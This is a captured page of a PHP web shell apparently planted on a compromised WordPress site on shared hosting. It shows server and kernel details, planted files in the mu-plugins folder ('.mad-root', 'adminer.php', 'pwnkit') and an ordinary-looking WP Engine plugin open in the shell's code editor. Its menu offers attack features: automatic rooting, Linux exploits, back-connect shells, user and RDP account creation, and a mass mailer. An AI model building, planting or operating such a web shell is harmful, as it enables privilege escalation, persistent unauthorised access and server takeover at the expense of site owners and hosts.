Linux webd002.cluster130.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64
Apache
: 10.130.40.2 | : 216.73.217.172
Cant Read [ /etc/named.conf ]
8.3.31
espacpq
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
espacpq /
www /
wp-content /
mu-plugins /
[ HOME SHELL ]
Name
Size
Permission
Action
force-strong-passwords
[ DIR ]
drwxr-xr-x
wk
[ DIR ]
drwxr-xr-x
wpe-elasticpress-autosuggest-l...
[ DIR ]
drwxr-xr-x
wpe-wp-sign-on-plugin
[ DIR ]
drwxr-xr-x
wpengine-common
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
wpe-elasticpress-autosuggest-l...
2.21
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : wpe-elasticpress-autosuggest-logger.php
<?php /** * Plugin Name: WPE ElasticPress Autosuggest Logger * Plugin URI: https://wpengine.com * Description: Appends autosuggest search terms to the url when elasticpress plugin is enabled * Version: 1.0.0 * Text Domain: wpe-elasticpress-autosuggest-logger * Domain Path: /languages * Author: WP Engine * Author URI: https://wpengine.com/ * License: GPLv2 * * @package WPEngine\wpe_elasticpress_autosuggest_logger */ define( 'WPENGINE_WPE_ES_AUTOSUGGEST_LOGGER_VERSION', '1.0.0' ); add_action( 'plugins_loaded', 'wpe_elasticpress_autosuggest_logger_loader' ); /** * Registers all hooks necessary for the feature * * @since 1.0.0 */ function wpe_elasticpress_autosuggest_logger_loader() { // Check if this plugin has been disabled in the config file if ( defined( 'DISABLE_WPE_ES_AUTOSUGGEST_LOGGER' ) && true === DISABLE_WPE_ES_AUTOSUGGEST_LOGGER ) { return; } else { // Get active plugins $active_plugins = get_option( 'active_plugins' ); // Check if elasticpress plugin is activated if ( in_array( 'elasticpress/elasticpress.php', $active_plugins, true ) ) { // Enable autosuggest metrics script add_action( 'wp_enqueue_scripts', 'wpe_elasticpress_autosuggest_logger_action_wp_enqueue_scripts' ); } } } /** * Action wp_enqueue_scripts * * Enqueue's necessary JavaScript required for processing * * @since 1.0.0 */ function wpe_elasticpress_autosuggest_logger_action_wp_enqueue_scripts() { // Get elasticpress feature settings $ep_settings = get_option( 'ep_feature_settings' ); // If autosuggest is enabled register the autosuggest metrics script if ( is_array( $ep_settings ) && isset( $ep_settings['autosuggest'] ) && isset( $ep_settings['autosuggest']['active'] ) && true === $ep_settings['autosuggest']['active'] ) { $min = '-min'; $version = WPENGINE_WPE_ES_AUTOSUGGEST_LOGGER_VERSION; $plugin_url = plugin_dir_url( __FILE__ ); if ( defined( 'SCRIPT_DEBUG' ) && true === SCRIPT_DEBUG ) { $min = ''; $version = time(); } wp_register_script( 'wpe-autosuggest-metrics', $plugin_url . 'wpe-elasticpress-autosuggest-logger/wpe-autosuggest' . $min . '.js', array( 'elasticpress-autosuggest' ), $version, true ); wp_enqueue_script( 'wpe-autosuggest-metrics' ); } }
Close